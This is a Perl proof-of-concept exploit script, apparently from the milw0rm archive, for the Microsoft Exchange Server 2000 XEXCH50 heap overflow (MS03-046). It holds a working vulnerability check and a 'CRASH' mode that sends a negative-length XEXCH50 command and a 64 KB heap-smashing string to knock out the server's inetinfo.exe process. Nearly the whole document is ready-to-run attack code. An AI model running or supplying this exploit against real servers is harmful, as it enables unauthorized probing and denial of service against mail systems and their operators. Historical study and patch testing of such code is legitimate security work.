Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046) - CVE-2003-0714

1. #!/usr/bin/perl -w
2. ##################
3.  
4. ##
5. # ms03-046.pl - hdm metasploit com
6. # This vulnerability allows a remote unauthenticated user to overwrite big chunks
7. # of the heap used by the inetinfo.exe process. Reliably exploiting this bug is
8. # non-trivial; even though the entire buffer is binary safe (even nulls) and can be
9. # just about any size, the actual code that crashes varies widely with each request.
10. # During the analysis process, numerous combinations of request size, concurrent
11. # requests, pre-allocations, and alternate trigger routes were examined and not a
12. # single duplicate of location and data offset was discovered. Hopefully the magic
13. # combination of data, size, and setup will be found to allow this bug to be reliably
14. # exploited.
15.  
16. # minor bugfix: look for 354 Send binary data
17.  
18. use strict;
19. use IO::Socket;
20.  
21. my $host = shift() || usage();
22. my $mode = shift() || "CHECK";
23. my $port = 25;
24.  
25.  
26. if (uc($mode) eq "CHECK") { check() }
27. if (uc($mode) eq "CRASH") { crash() }
28.  
29. usage();
30.  
31.  
32. sub check
33. {
34.     my $s = SMTP($host, $port);
35.     if (! $s)
36.     {
37.         print "[*] Error establishing connection to SMTP service.\n";
38.         exit(0);
39.     }
40.  
41.     print $s "XEXCH50 2 2\r\n";
42.     my $res = <$s>;    
43.     close ($s);
44.  
45.     # a patched server only allows XEXCH50 after NTLM authentication
46.     if ($res !~ /354 Send binary/i)
47.     {
48.         print "[*] This server has been patched or is not vulnerable.\n";
49.         exit(0);
50.     }
51.  
52.     print "[*] This system is vulnerable: $host:$port\n";
53.  
54.     exit(0);
55. }
56.  
57.  
58. sub crash
59. {
60.     my $s = SMTP($host, $port);
61.     if (! $s)
62.     {
63.         print "[*] Error establishing connection to SMTP service.\n";
64.         exit(0);
65.     }
66.  
67.     # the negative value allows us to overwrite random heap bits
68.     print $s "XEXCH50 -1 2\r\n";
69.     my $res = <$s>;    
70.  
71.     # a patched server only allows XEXCH50 after NTLM authentication
72.     if ($res !~ /354 Send binary/i)
73.     {
74.         print "[*] This server has been patched or is not vulnerable.\n";
75.         exit(0);
76.     }
77.  
78.     print "[*] Sending massive heap-smashing string...\n";
79.     print $s ("META" x 16384);
80.  
81.     # sometimes a second connection is required to trigger the crash
82.     $s = SMTP($host, $port);
83.  
84.     exit(0);
85. }
86.  
87.  
88. sub usage
89. {
90.     print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
91.     exit(0);
92.  
93. }
94.  
95. sub SMTP
96. {
97.     my ($host, $port) = @_;
98.     my $s = IO::Socket::INET->new
99.     (
100.         PeerAddr => $host,
101.         PeerPort => $port,
102.         Proto    => "tcp"
103.     ) || return(undef);
104.  
105.     my $r = <$s>;
106.     return undef if !$r;
107.    
108.     if ($r !~ /Microsoft/)
109.     {
110.         chomp($r);
111.         print STDERR "[*] This does not look like an exchange server: $r\n";
112.         return(undef);
113.     }
114.    
115.     print $s "HELO X\r\n";
116.     $r = <$s>;
117.     return undef if !$r;  
118.  
119.     print $s "MAIL FROM: DoS\r\n";
120.     $r = <$s>;
121.     return undef if !$r;
122.    
123.     print $s "RCPT TO: Administrator\r\n";
124.     $r = <$s>;
125.     return undef if !$r;
126.    
127.     return($s);
128. }
129.  
130.  
131. # milw0rm.com [2003-10-22]
132.